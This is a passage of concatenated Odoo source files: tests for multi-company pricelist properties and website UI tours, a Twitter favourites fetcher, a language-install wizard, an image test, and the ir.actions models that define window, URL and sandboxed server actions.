self.c1_pl = self.env['product.pricelist'].create({
'name': 'Company 1 Pricelist',
'company_id': self.company1.id,
})
self.c2_pl = self.env['product.pricelist'].create({
'name': 'Company 2 Pricelist',
'company_id': self.company2.id,
'website_id': False,
})
self.demo_user.partner_id.property_product_pricelist = self.c1_pl
# Switch env.user company to create ir.property in company2
self.env.user.company_id = self.company2
self.demo_user.partner_id.property_product_pricelist = self.c2_pl
# Ensure everything was done correctly
self.assertEqual(self.demo_user.partner_id.with_context(force_company=self.company1.id).property_product_pricelist, self.c1_pl)
self.assertEqual(self.demo_user.partner_id.with_context(force_company=self.company2.id).property_product_pricelist, self.c2_pl)
irp1 = self.env['ir.property'].search([
('name', '=', 'property_product_pricelist'),
('company_id', '=', self.company1.id),
('res_id', '=', 'res.partner,%s' % self.demo_user.partner_id.id),
('value_reference', '=', 'product.pricelist,%s' % self.c1_pl.id),
])
irp2 = self.env['ir.property'].search([
('name', '=', 'property_product_pricelist'),
('company_id', '=', self.company2.id),
('res_id', '=', 'res.partner,%s' % self.demo_user.partner_id.id),
('value_reference', '=', 'product.pricelist,%s' % self.c2_pl.id),
])
self.assertEqual(len(irp1 + irp2), 2, "Ensure there is an `ir.property` for demo partner for every company, and that the pricelist is the company specific one.")
simulate_frontend_context(self)
# ---------------------------------- IR.PROPERTY -------------------------------------
# id | name | res_id | company_id | value_reference
# ------------------------------------------------------------------------------------
# 1 | 'property_product_pricelist' | | 1 | product.pricelist,1
# 2 | 'property_product_pricelist' | | 2 | product.pricelist,2
# 3 | 'property_product_pricelist' | res.partner,8 | 1 | product.pricelist,10
# 4 | 'property_product_pricelist' | res.partner,8 | 2 | product.pricelist,11
def test_property_product_pricelist_multi_company(self):
''' Test that the `property_product_pricelist` of `res.partner` is read
for the company of the website and not the current user company.
This is the case if the user visit a website for which the company
is not the same as its user's company.
Here, as demo user (company1), we will visit website1 (company2).
It should return the ir.property for demo user for company2 and not
for the company1 as we should get the website's company pricelist
and not the demo user's current company pricelist.
'''
# First check: It should return ir.property,4 as company_id is
# website.company_id and not env.user.company_id
company_id = self.website.company_id.id
partner = self.demo_user.partner_id.with_context(force_company=company_id)
demo_pl = partner.property_product_pricelist
self.assertEqual(demo_pl, self.c2_pl)
# Second thing to check: It should not error in read right access error
# Indeed, the ir.rule for pricelists rights about company should allow to
# also read a pricelist from another company if that company is the one
# from the currently visited website.
self.env(user=self.env.ref('base.user_demo'))['product.pricelist'].browse(demo_pl.id).name
```
#### File: website/tests/test_ui.py
```python
import odoo
import odoo.tests
@odoo.tests.tagged('-at_install', 'post_install')
class TestUiCustomizeTheme(odoo.tests.HttpCase):
def test_01_attachment_website_unlink(self):
''' Some ir.attachment needs to be unlinked when a website is unlink,
otherwise some flows will just crash. That's the case when 2 website
have their theme color customized. Removing a website will make its
customized attachment generic, thus having 2 attachments with the
same URL available for other websites, leading to singleton errors
(among other).
But no all attachment should be deleted, eg we don't want to delete
a SO or invoice PDF coming from an ecommerce order.
'''
Website = self.env['website']
Page = self.env['website.page']
Attachment = self.env['ir.attachment']
website_default = Website.browse(1)
website_test = Website.create({'name': 'Website Test'})
# simulate attachment state when editing 2 theme through customize
custom_url = '/TEST/website/static/src/scss/options/colors/user_theme_color_palette.custom.web.assets_common.scss'
scss_attachment = Attachment.create({
'name': custom_url,
'type': 'binary',
'mimetype': 'text/scss',
'datas': '',
'datas_fname': custom_url,
'url': custom_url,
'website_id': website_default.id
})
scss_attachment.copy({'website_id': website_test.id})
# simulate PDF from ecommerce order
# Note: it will only have its website_id flag if the website has a domain
# equal to the current URL (fallback or get_current_website())
so_attachment = Attachment.create({
'name': 'SO036.pdf',
'type': 'binary',
'mimetype': 'application/pdf',
'datas': '',
'website_id': website_test.id
})
# avoid sql error on page website_id restrict
Page.search([('website_id', '=', website_test.id)]).unlink()
website_test.unlink()
self.assertEqual(Attachment.search_count([('url', '=', custom_url)]), 1, 'Should not left duplicates when deleting a website')
self.assertTrue(so_attachment.exists(), 'Most attachment should not be deleted')
self.assertFalse(so_attachment.website_id, 'Website should be removed')
@odoo.tests.tagged('-at_install', 'post_install')
class TestUiHtmlEditor(odoo.tests.HttpCase):
def test_html_editor_multiple_templates(self):
Website = self.env['website']
View = self.env['ir.ui.view']
generic_aboutus = Website.viewref('website.aboutus')
# Use an empty page layout with oe_structure id for this test
oe_structure_layout = '''
<t name="About us" t-name="website.aboutus">
<t t-call="website.layout">
<p>aboutus</p>
<div id="oe_structure_test_ui" class="oe_structure oe_empty"/>
</t>
</t>
'''
generic_aboutus.arch = oe_structure_layout
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('html_editor_multiple_templates')", "odoo.__DEBUG__.services['web_tour.tour'].tours.html_editor_multiple_templates.ready", login='admin')
self.assertEqual(View.search_count([('key', '=', 'website.aboutus')]), 2, "Aboutus view should have been COW'd")
self.assertTrue(generic_aboutus.arch == oe_structure_layout, "Generic Aboutus view should be untouched")
self.assertEqual(len(generic_aboutus.inherit_children_ids.filtered(lambda v: 'oe_structure' in v.name)), 0, "oe_structure view should have been deleted when aboutus was COW")
specific_aboutus = Website.with_context(website_id=1).viewref('website.aboutus')
self.assertTrue(specific_aboutus.arch != oe_structure_layout, "Specific Aboutus view should have been changed")
self.assertEqual(len(specific_aboutus.inherit_children_ids.filtered(lambda v: 'oe_structure' in v.name)), 1, "oe_structure view should have been created on the specific tree")
def test_html_editor_scss(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('test_html_editor_scss')", "odoo.__DEBUG__.services['web_tour.tour'].tours.test_html_editor_scss.ready", login='admin')
class TestUiTranslate(odoo.tests.HttpCase):
def test_admin_tour_rte_translator(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('rte_translator')", "odoo.__DEBUG__.services['web_tour.tour'].tours.rte_translator.ready", login='admin', timeout=120)
@odoo.tests.common.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_public_homepage(self):
self.phantom_js("/", "console.log('ok')", "'website.content.snippets.animation' in odoo.__DEBUG__.services")
def test_02_admin_tour_banner(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('banner')", "odoo.__DEBUG__.services['web_tour.tour'].tours.banner.ready", login='admin')
```
#### File: website_twitter/models/website_twitter.py
```python
import json
import logging
import requests
from odoo import api, fields, models
API_ENDPOINT = 'https://api.twitter.com'
API_VERSION = '1.1'
REQUEST_TOKEN_URL = '%s/oauth2/token' % API_ENDPOINT
REQUEST_FAVORITE_LIST_URL = '%s/%s/favorites/list.json' % (API_ENDPOINT, API_VERSION)
URLOPEN_TIMEOUT = 10
_logger = logging.getLogger(__name__)
class WebsiteTwitter(models.Model):
_inherit = 'website'
twitter_api_key = fields.Char(string='Twitter API key', help='Twitter API Key')
twitter_api_secret = fields.Char(string='Twitter API secret', help='Twitter API Secret')
twitter_screen_name = fields.Char(string='Get favorites from this screen name')
@api.model
def _request(self, website, url, params=None):
"""Send an authenticated request to the Twitter API."""
access_token = self._get_access_token(website)
try:
request = requests.get(url, params=params, headers={'Authorization': 'Bearer %s' % access_token}, timeout=URLOPEN_TIMEOUT)
request.raise_for_status()
return request.json()
except requests.HTTPError as e:
_logger.debug("Twitter API request failed with code: %r, msg: %r, content: %r",
e.response.status_code, e.response.reason, e.response.content)
raise
@api.model
def _refresh_favorite_tweets(self):
''' called by cron job '''
website = self.env['website'].search([('twitter_api_key', '!=', False),
('twitter_api_secret', '!=', False),
('twitter_screen_name', '!=', False)])
_logger.debug("Refreshing tweets for website IDs: %r", website.ids)
website.fetch_favorite_tweets()
@api.multi
def fetch_favorite_tweets(self):
WebsiteTweets = self.env['website.twitter.tweet']
tweet_ids = []
for website in self:
if not all((website.twitter_api_key, website.twitter_api_secret, website.twitter_screen_name)):
_logger.debug("Skip fetching favorite tweets for unconfigured website %s", website)
continue
params = {'screen_name': website.twitter_screen_name}
last_tweet = WebsiteTweets.search([('website_id', '=', website.id),
('screen_name', '=', website.twitter_screen_name)],
limit=1, order='tweet_id desc')
if last_tweet:
params['since_id'] = int(last_tweet.tweet_id)
_logger.debug("Fetching favorite tweets using params %r", params)
response = self._request(website, REQUEST_FAVORITE_LIST_URL, params=params)
for tweet_dict in response:
tweet_id = tweet_dict['id'] # unsigned 64-bit snowflake ID
tweet_ids = WebsiteTweets.search([('tweet_id', '=', tweet_id)]).ids
if not tweet_ids:
new_tweet = WebsiteTweets.create(
{
'website_id': website.id,
'tweet': json.dumps(tweet_dict),
'tweet_id': tweet_id, # stored in NUMERIC PG field
'screen_name': website.twitter_screen_name,
})
_logger.debug("Found new favorite: %r, %r", tweet_id, tweet_dict)
tweet_ids.append(new_tweet.id)
return tweet_ids
def _get_access_token(self, website):
"""Obtain a bearer token."""
r = requests.post(
REQUEST_TOKEN_URL,
data={'grant_type': 'client_credentials',},
auth=(website.twitter_api_key, website.twitter_api_secret),
timeout=URLOPEN_TIMEOUT,
)
r.raise_for_status()
data = r.json()
access_token = data['access_token']
return access_token
```
#### File: website/wizard/base_language_install.py
```python
from odoo import api, fields, models
class BaseLanguageInstall(models.TransientModel):
_inherit = "base.language.install"
website_ids = fields.Many2many('website', string='Websites to translate')
@api.model
def default_get(self, fields):
defaults = super(BaseLanguageInstall, self).default_get(fields)
website_id = self._context.get('params', {}).get('website_id')
if website_id:
if 'website_ids' not in defaults:
defaults['website_ids'] = []
defaults['website_ids'].append(website_id)
return defaults
@api.multi
def lang_install(self):
action = super(BaseLanguageInstall, self).lang_install()
lang = self.env['res.lang'].search([('code', '=', self.lang)], limit=1)
if self.website_ids and lang:
self.website_ids.write({'language_ids': [(4, lang.id)]})
params = self._context.get('params', {})
if 'url_return' in params:
return {
'url': params['url_return'].replace('[lang]', self.lang),
'type': 'ir.actions.act_url',
'target': 'self'
}
return action
```
#### File: web/tests/test_image.py
```python
import io
from PIL import Image
from odoo.tests.common import HttpCase
class TestImage(HttpCase):
def test_01_content_image_resize_placeholder(self):
response = self.url_open('/web/image/0/200x150')
image = Image.open(io.BytesIO(response.content))
self.assertEqual(image.size, (200, 150))
response = self.url_open('/web/image/fake/0/image_small')
image = Image.open(io.BytesIO(response.content))
self.assertEqual(image.size, (64, 64))
```
#### File: base/models/ir_actions.py
```python
import odoo
from odoo import api, fields, models, tools, SUPERUSER_ID, _
from odoo.exceptions import MissingError, UserError, ValidationError, AccessError
from odoo.osv import expression
from odoo.tools.safe_eval import safe_eval, test_python_expr
from odoo.tools import pycompat, wrap_module
from odoo.http import request
import base64
from collections import defaultdict
import datetime
import logging
import time
from pytz import timezone
_logger = logging.getLogger(__name__)
# build dateutil helper, starting with the relevant *lazy* imports
import dateutil
import dateutil.parser
import dateutil.relativedelta
import dateutil.rrule
import dateutil.tz
mods = {'parser', 'relativedelta', 'rrule', 'tz'}
attribs = {atr for m in mods for atr in getattr(dateutil, m).__all__}
dateutil = wrap_module(dateutil, mods | attribs)
class IrActions(models.Model):
_name = 'ir.actions.actions'
_description = 'Actions'
_table = 'ir_actions'
_order = 'name'
name = fields.Char(required=True)
type = fields.Char(string='Action Type', required=True)
xml_id = fields.Char(compute='_compute_xml_id', string="External ID")
help = fields.Html(string='Action Description',
help='Optional help text for the users with a description of the target view, such as its usage and purpose.',
translate=True)
binding_model_id = fields.Many2one('ir.model', ondelete='cascade',
help="Setting a value makes this action available in the sidebar for the given model.")
binding_type = fields.Selection([('action', 'Action'),
('action_form_only', "Form-only"),
('report', 'Report')],
required=True, default='action')
def _compute_xml_id(self):
res = self.get_external_id()
for record in self:
record.xml_id = res.get(record.id)
@api.model_create_multi
def create(self, vals_list):
res = super(IrActions, self).create(vals_list)
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.multi
def write(self, vals):
res = super(IrActions, self).write(vals)
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.multi
def unlink(self):
"""unlink ir.action.todo which are related to actions which will be deleted.
NOTE: ondelete cascade will not work on ir.actions.actions so we will need to do it manually."""
todos = self.env['ir.actions.todo'].search([('action_id', 'in', self.ids)])
todos.unlink()
res = super(IrActions, self).unlink()
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.model
def _get_eval_context(self, action=None):
""" evaluation context to pass to safe_eval """
return {
'uid': self._uid,
'user': self.env.user,
'time': time,
'datetime': datetime,
'dateutil': dateutil,
'timezone': timezone,
'b64encode': base64.b64encode,
'b64decode': base64.b64decode,
}
@api.model
@tools.ormcache('frozenset(self.env.user.groups_id.ids)', 'model_name')
def get_bindings(self, model_name):
""" Retrieve the list of actions bound to the given model.
:return: a dict mapping binding types to a list of dict describing
actions, where the latter is given by calling the method
``read`` on the action record.
"""
cr = self.env.cr
query = """ SELECT a.id, a.type, a.binding_type
FROM ir_actions a, ir_model m
WHERE a.binding_model_id=m.id AND m.model=%s
ORDER BY a.id """
cr.execute(query, [model_name])
# discard unauthorized actions, and read action definitions
result = defaultdict(list)
user_groups = self.env.user.groups_id
for action_id, action_model, binding_type in cr.fetchall():
try:
action = self.env[action_model].browse(action_id)
action_groups = getattr(action, 'groups_id', ())
if action_groups and not action_groups & user_groups:
# the user may not perform this action
continue
result[binding_type].append(action.read()[0])
except (AccessError, MissingError):
continue
return result
class IrActionsActWindow(models.Model):
_name = 'ir.actions.act_window'
_description = 'Action Window'
_table = 'ir_act_window'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'name'
@api.constrains('res_model', 'src_model')
def _check_model(self):
for action in self:
if action.res_model not in self.env:
raise ValidationError(_('Invalid model name %r in action definition.') % action.res_model)
if action.src_model and action.src_model not in self.env:
raise ValidationError(_('Invalid model name %r in action definition.') % action.src_model)
@api.depends('view_ids.view_mode', 'view_mode', 'view_id.type')
def _compute_views(self):
""" Compute an ordered list of the specific view modes that should be
enabled when displaying the result of this action, along with the
ID of the specific view to use for each mode, if any were required.
This function hides the logic of determining the precedence between
the view_modes string, the view_ids o2m, and the view_id m2o that
can be set on the action.
"""
for act in self:
act.views = [(view.view_id.id, view.view_mode) for view in act.view_ids]
got_modes = [view.view_mode for view in act.view_ids]
all_modes = act.view_mode.split(',')
missing_modes = [mode for mode in all_modes if mode not in got_modes]
if missing_modes:
if act.view_id.type in missing_modes:
# reorder missing modes to put view_id first if present
missing_modes.remove(act.view_id.type)
act.views.append((act.view_id.id, act.view_id.type))
act.views.extend([(False, mode) for mode in missing_modes])
@api.depends('res_model', 'search_view_id')
def _compute_search_view(self):
for act in self:
fvg = self.env[act.res_model].fields_view_get(act.search_view_id.id, 'search')
act.search_view = str(fvg)
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default="ir.actions.act_window")
view_id = fields.Many2one('ir.ui.view', string='View Ref.', ondelete='set null')
domain = fields.Char(string='Domain Value',
help="Optional domain filtering of the destination data, as a Python expression")
context = fields.Char(string='Context Value', default={}, required=True,
help="Context dictionary as Python expression, empty by default (Default: {})")
res_id = fields.Integer(string='Record ID', help="Database ID of record to open in form view, when ``view_mode`` is set to 'form' only")
res_model = fields.Char(string='Destination Model', required=True,
help="Model name of the object to open in the view window")
src_model = fields.Char(string='Source Model',
help="Optional model name of the objects on which this action should be visible")
target = fields.Selection([('current', 'Current Window'), ('new', 'New Window'), ('inline', 'Inline Edit'), ('fullscreen', 'Full Screen'), ('main', 'Main action of Current Window')], default="current", string='Target Window')
view_mode = fields.Char(required=True, default='tree,form',
help="Comma-separated list of allowed view modes, such as 'form', 'tree', 'calendar', etc. (Default: tree,form)")
view_type = fields.Selection([('tree', 'Tree'), ('form', 'Form')], default="form", string='View Type', required=True,
help="View type: Tree type to use for the tree view, set to 'tree' for a hierarchical tree view, or 'form' for a regular list view")
usage = fields.Char(string='Action Usage',
help="Used to filter menu and home actions from the user form.")
view_ids = fields.One2many('ir.actions.act_window.view', 'act_window_id', string='No of Views')
views = fields.Binary(compute='_compute_views',
help="This function field computes the ordered list of views that should be enabled " \
"when displaying the result of an action, federating view mode, views and " \
"reference view. The result is returned as an ordered list of pairs (view_id,view_mode).")
limit = fields.Integer(default=80, help='Default limit for the list view')
groups_id = fields.Many2many('res.groups', 'ir_act_window_group_rel',
'act_id', 'gid', string='Groups')
search_view_id = fields.Many2one('ir.ui.view', string='Search View Ref.')
filter = fields.Boolean()
auto_search = fields.Boolean(default=True)
search_view = fields.Text(compute='_compute_search_view')
multi = fields.Boolean(string='Restrict to lists', help="If checked and the action is bound to a model, it will only appear in the More menu on list views")
@api.multi
def read(self, fields=None, load='_classic_read'):
""" call the method get_empty_list_help of the model and set the window action help message
"""
result = super(IrActionsActWindow, self).read(fields, load=load)
if not fields or 'help' in fields:
for values in result:
model = values.get('res_model')
if model in self.env:
eval_ctx = dict(self.env.context)
try:
ctx = safe_eval(values.get('context', '{}'), eval_ctx)
except:
ctx = {}
values['help'] = self.with_context(**ctx).env[model].get_empty_list_help(values.get('help', ''))
return result
@api.model
def for_xml_id(self, module, xml_id):
""" Returns the act_window object created for the provided xml_id
:param module: the module the act_window originates in
:param xml_id: the namespace-less id of the action (the @id
attribute from the XML file)
:return: A read() view of the ir.actions.act_window
"""
record = self.env.ref("%s.%s" % (module, xml_id))
return record.read()[0]
@api.model_create_multi
def create(self, vals_list):
self.clear_caches()
return super(IrActionsActWindow, self).create(vals_list)
@api.multi
def unlink(self):
self.clear_caches()
return super(IrActionsActWindow, self).unlink()
@api.multi
def exists(self):
ids = self._existing()
existing = self.filtered(lambda rec: rec.id in ids)
if len(existing) < len(self):
# mark missing records in cache with a failed value
exc = MissingError(
_("Record does not exist or has been deleted.")
+ '\n\n({} {}, {} {})'.format(_('Records:'), (self - existing).ids[:6], _('User:'), self._uid)
)
for record in (self - existing):
record._cache.set_failed(self._fields, exc)
return existing
@api.model
@tools.ormcache()
def _existing(self):
self._cr.execute("SELECT id FROM %s" % self._table)
return set(row[0] for row in self._cr.fetchall())
VIEW_TYPES = [
('tree', 'Tree'),
('form', 'Form'),
('graph', 'Graph'),
('pivot', 'Pivot'),
('calendar', 'Calendar'),
('gantt', 'Gantt'),
('kanban', 'Kanban'),
]
class IrActionsActWindowView(models.Model):
_name = 'ir.actions.act_window.view'
_description = 'Action Window View'
_table = 'ir_act_window_view'
_rec_name = 'view_id'
_order = 'sequence,id'
sequence = fields.Integer()
view_id = fields.Many2one('ir.ui.view', string='View')
view_mode = fields.Selection(VIEW_TYPES, string='View Type', required=True)
act_window_id = fields.Many2one('ir.actions.act_window', string='Action', ondelete='cascade')
multi = fields.Boolean(string='On Multiple Doc.', help="If set to true, the action will not be displayed on the right toolbar of a form view.")
@api.model_cr_context
def _auto_init(self):
res = super(IrActionsActWindowView, self)._auto_init()
tools.create_unique_index(self._cr, 'act_window_view_unique_mode_per_action',
self._table, ['act_window_id', 'view_mode'])
return res
class IrActionsActWindowclose(models.Model):
_name = 'ir.actions.act_window_close'
_description = 'Action Window Close'
_inherit = 'ir.actions.actions'
_table = 'ir_actions'
type = fields.Char(default='ir.actions.act_window_close')
class IrActionsActUrl(models.Model):
_name = 'ir.actions.act_url'
_description = 'Action URL'
_table = 'ir_act_url'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'name'
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.act_url')
url = fields.Text(string='Action URL', required=True)
target = fields.Selection([('new', 'New Window'), ('self', 'This Window')],
string='Action Target', default='new', required=True)
class IrActionsServer(models.Model):
""" Server actions model. Server action work on a base model and offer various
type of actions that can be executed automatically, for example using base
action rules, of manually, by adding the action in the 'More' contextual
menu.
Since Odoo 8.0 a button 'Create Menu Action' button is available on the
action form view. It creates an entry in the More menu of the base model.
This allows to create server actions and run them in mass mode easily through
the interface.
The available actions are :
- 'Execute Python Code': a block of python code that will be executed
- 'Create a new Record': create a new record with new values
- 'Write on a Record': update the values of a record
- 'Execute several actions': define an action that triggers several other
server actions
"""
_name = 'ir.actions.server'
_description = 'Server Actions'
_table = 'ir_act_server'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'sequence,name'
DEFAULT_PYTHON_CODE = """# Available variables:
# - env: Odoo Environment on which the action is triggered
# - model: Odoo Model of the record on which the action is triggered; is a void recordset
# - record: record on which the action is triggered; may be void
# - records: recordset of all records on which the action is triggered in multi-mode; may be void
# - time, datetime, dateutil, timezone: useful Python libraries
# - log: log(message, level='info'): logging function to record debug information in ir.logging table
# - Warning: Warning Exception to use with raise
# To return an action, assign: action = {...}\n\n\n\n"""
@api.model
def _select_objects(self):
records = self.env['ir.model'].search([])
return [(record.model, record.name) for record in records] + [('', '')]
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.server')
usage = fields.Selection([
('ir_actions_server', 'Server Action'),
('ir_cron', 'Scheduled Action')], string='Usage',
default='ir_actions_server', required=True)
state = fields.Selection([
('code', 'Execute Python Code'),
('object_create', 'Create a new Record'),
('object_write', 'Update the Record'),
('multi', 'Execute several actions')], string='Action To Do',
default='object_write', required=True,
help="Type of server action. The following values are available:\n"
"- 'Execute Python Code': a block of python code that will be executed\n"
"- 'Create': create a new record with new values\n"
"- 'Update a Record': update the values of a record\n"
"- 'Execute several actions': define an action that triggers several other server actions\n"
"- 'Send Email': automatically send an email (Discuss)\n"
"- 'Add Followers': add followers to a record (Discuss)\n"
"- 'Create Next Activity': create an activity (Discuss)")
# Generic
sequence = fields.Integer(default=5,
help="When dealing with multiple actions, the execution order is "
"based on the sequence. Low number means high priority.")
model_id = fields.Many2one('ir.model', string='Model', required=True, ondelete='cascade',
help="Model on which the server action runs.")
model_name = fields.Char(related='model_id.model', string='Model Name', readonly=True, store=True)
# Python code
code = fields.Text(string='Python Code', groups='base.group_system',
default=DEFAULT_PYTHON_CODE,
help="Write Python code that the action will execute. Some variables are "
"available for use; help about python expression is given in the help tab.")
# Multi
child_ids = fields.Many2many('ir.actions.server', 'rel_server_actions', 'server_id', 'action_id',
string='Child Actions', help='Child server actions that will be executed. Note that the last return returned action value will be used as global return value.')
# Create
crud_model_id = fields.Many2one('ir.model', string='Create/Write Target Model',
oldname='srcmodel_id', help="Model for record creation / update. Set this field only to specify a different model than the base model.")
crud_model_name = fields.Char(related='crud_model_id.model', string='Target Model', readonly=True)
link_field_id = fields.Many2one('ir.model.fields', string='Link using field',
help="Provide the field used to link the newly created record "
"on the record on used by the server action.")
fields_lines = fields.One2many('ir.server.object.lines', 'server_id', string='Value Mapping', copy=True)
@api.constrains('code')
def _check_python_code(self):
for action in self.sudo().filtered('code'):
msg = test_python_expr(expr=action.code.strip(), mode="exec")
if msg:
raise ValidationError(msg)
@api.constrains('child_ids')
def _check_recursion(self):
if not self._check_m2m_recursion('child_ids'):
raise ValidationError(_('Recursion found in child server actions'))
@api.onchange('crud_model_id')
def _onchange_crud_model_id(self):
self.link_field_id = False
self.crud_model_name = self.crud_model_id.model
@api.onchange('model_id')
def _onchange_model_id(self):
self.model_name = self.model_id.model
@api.multi
def create_action(self):
""" Create a contextual action for each server action. """
for action in self:
action.write({'binding_model_id': action.model_id.id,
'binding_type': 'action'})
return True
@api.multi
def unlink_action(self):
""" Remove the contextual actions created for the server actions. """
self.check_access_rights('write', raise_exception=True)
self.filtered('binding_model_id').write({'binding_model_id': False})
return True
@api.model
def run_action_code_multi(self, action, eval_context=None):
safe_eval(action.sudo().code.strip(), eval_context, mode="exec", nocopy=True) # nocopy allows to return 'action'
if 'action' in eval_context:
return eval_context['action']
@api.model
def run_action_multi(self, action, eval_context=None):
res = False
for act in action.child_ids:
result = act.run()
if result:
res = result
return res
@api.model
def run_action_object_write(self, action, eval_context=None):
"""Apply specified write changes to active_id."""
res = {}
for exp in action.fields_lines:
res[exp.col1.name] = exp.eval_value(eval_context=eval_context)[exp.id]
if self._context.get('onchange_self'):
record_cached = self._context['onchange_self']
for field, new_value in res.items():
record_cached[field] = new_value
else:
self.env[action.model_id.model].browse(self._context.get('active_id')).write(res)
@api.model
def run_action_object_create(self, action, eval_context=None):
"""Create specified model object with specified values.
If applicable, link active_id.<self.link_field_id> to the new record.
"""
res = {}
for exp in action.fields_lines:
res[exp.col1.name] = exp.eval_value(eval_context=eval_context)[exp.id]
res = self.env[action.crud_model_id.model].create(res)
if action.link_field_id:
record = self.env[action.model_id.model].browse(self._context.get('active_id'))
record.write({action.link_field_id.name: res.id})
@api.model
def _get_eval_context(self, action=None):
""" Prepare the context used when evaluating python code, like the
python formulas or code server actions.
:param action: the current server action
:type action: browse record
:returns: dict -- evaluation context given to (safe_)safe_eval """
def log(message, level="info"):
with self.pool.cursor() as cr:
cr.execute("""
INSERT INTO ir_logging(create_date, create_uid, type, dbname, name, level, message, path, line, func)
VALUES (NOW() at time zone 'UTC', %s, %s, %s, %s, %s, %s, %s, %s, %s)
""", (self.env.uid, 'server', self._cr.dbname, __name__, level, message, "action", action.id, action.name))
eval_context = super(IrActionsServer, self)._get_eval_context(action=action)
model_name = action.model_id.sudo().model
model = self.env[model_name]
record = None
records = None
if self._context.get('active_model') == model_name and self._context.get('active_id'):
record = model.browse(self._context['active_id'])
if self._context.get('active_model') == model_name and self._context.get('active_ids'):
records = model.browse(self._context['active_ids'])
if self._context.get('onchange_self'):
record = self._context['onchange_self']
eval_context.update({
# orm
'env': self.env,
'model': model,
# Exceptions
'Warning': odoo.exceptions.Warning,
# record
'record': record,
'records': records,
# helpers
'log': log,
})
return eval_context
@api.multi
def run(self):
""" Runs the server action. For each server action, the
run_action_<STATE> method is called. This allows easy overriding
of the server actions.
:param dict context: context should contain following keys
- active_id: id of the current object (single mode)
- active_model: current model that should equal the action's model
The following keys are optional:
- active_ids: ids of the current records (mass mode). If active_ids
and active_id are present, active_ids is given precedence.
:return: an action_id to be executed, or False is finished correctly without
return action
"""
res = False
for action in self:
eval_context = self._get_eval_context(action)
if hasattr(self, 'run_action_%s_multi' % action.state):
# call the multi method
run_self = self.with_context(eval_context['env'].context)
func = getattr(run_self, 'run_action_%s_multi' % action.state)
res = func(action, eval_context=eval_context)
elif hasattr(self, 'run_action_%s' % action.state):
active_id = self._context.get('active_id')
if not active_id and self._context.get('onchange_self'):
active_id = self._context['onchange_self']._origin.id
if not active_id: # onchange on new record
func = getattr(self, 'run_action_%s' % action.state)
res = func(action, eval_context=eval_context)
active_ids = self._context.get('active_ids', [active_id] if active_id else [])
for active_id in active_ids:
# run context dedicated to a particular active_id
run_self = self.with_context(active_ids=[active_id], active_id=active_id)
eval_context["env"].context = run_self._context
# call the single method related to the action: run_action_<STATE>
func = getattr(run_self, 'run_action_%s' % action.state)
res = func(action, eval_context=eval_context)
return res
@api.model
def _run_actions(self, ids):
"""
Run server actions with given ids.
Allow crons to run specific server actions
"""
return self.browse(ids).run()
class IrServerObjectLines(models.Model):
_name = 'ir.server.object.lines'
_description = 'Server Action value mapping'
_sequence = 'ir_actions_id_seq'
server_id = fields.Many2one('ir.actions.server', string='Related Server Action', ondelete='cascade')
col1 = fields.Many2one('ir.model.fields', string='Field', required=True)
value = fields.Text(required=True, help="Expression containing a value specification. \n"
"When Formula type is selected, this field may be a Python expression "
" that can use the same values as for the code field on the server action.\n"
"If Value type is selected, the value will be used directly without evaluation.")
type = fields.Selection([
('value', 'Value'),
('reference', 'Reference'),
('equation', 'Python expression')
], 'Evaluation Type', default='value', required=True, change_default=True)
resource_ref = fields.Reference(
string='Record', selection='_selection_target_model',
compute='_compute_resource_ref', inverse='_set_resource_ref')
@api.model
def _selection_target_model(self):
models = self.env['ir.model'].search([])
return [(model.model, model.name) for model in models]
@api.depends('col1.relation', 'value', 'type')
def _compute_resource_ref(self):
for line in self:
if line.type in ['reference', 'value'] and line.col1 and line.col1.relation:
value = line.value or ''
try:
value = int(value)
if not self.env[line.col1.relation].browse(value).exists():
record = self.env[line.col1.relation]._search([], limit=1)
value = record[0] if record else 0
except ValueError:
record = self.env[line.col1.relation]._search([], limit=1)
value = record[0] if record else 0
line.resource_ref = '%s,%s' % (line.col1.relation, value)
else:
line.resource_ref = False
@api.onchange('resource_ref')
def _set_resource_ref(self):
for line in self.filtered(lambda line: line.type == 'reference'):
if line.resource_ref:
line.value = str(line.resource_ref.id)
@api.multi
def eval_value(self, eval_context=None):
result = dict.fromkeys(self.ids, False)
for line in self:
expr = line.value
if line.type == 'equation':
expr = safe_eval(line.value, eval_context)
elif line.col1.ttype in ['many2one', 'integer']:
try:
expr = int(line.value)
except Exception:
pass
result[line.id] = expr
return result
class IrActionsTodo(models.Model):
"""
Configuration Wizards
"""
_name = 'ir.actions.todo'
_description = "Configuration Wizards"
_order = "sequence, id"
action_id = fields.Many2one('ir.actions.actions', string='Action', required=True, index=True)
sequence = fields.Integer(default=10)
state = fields.Selection([('open', 'To Do'), ('done', 'Done')], string='Status', default='open', required=True)
name = fields.Char()
@api.model_create_multi
def create(self, vals_list):
todos = super(IrActionsTodo, self).create(vals_list)
for todo in todos:
if todo.state == "open":
self.ensure_one_open_todo()
return todos
@api.multi
def write(self, vals):
res = super(IrActionsTodo, self).write(vals)
if vals.get('state', '') == 'open':
self.ensure_one_open_todo()
return res
@api.model
def ensure_one_open_todo(self):
open_todo = self.search([('state', '=', 'open')], order='sequence asc, id desc', offset=1)
if open_todo:
open_todo.write({'state': 'done'})
@api.multi
def name_get(self):
return [(record.id, record.action_id.name) for record in self]
@api.multi
def unlink(self):
if self:
try:
todo_open_menu = self.env.ref('base.open_menu')
# don't remove base.open_menu todo but set its original action
if todo_open_menu in self:
todo_open_menu.action_id = self.env.ref('base.action_client_base_menu').id
self -= todo_open_menu
except ValueError:
pass
return super(IrActionsTodo, self).unlink()
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
args = args or []
if name:
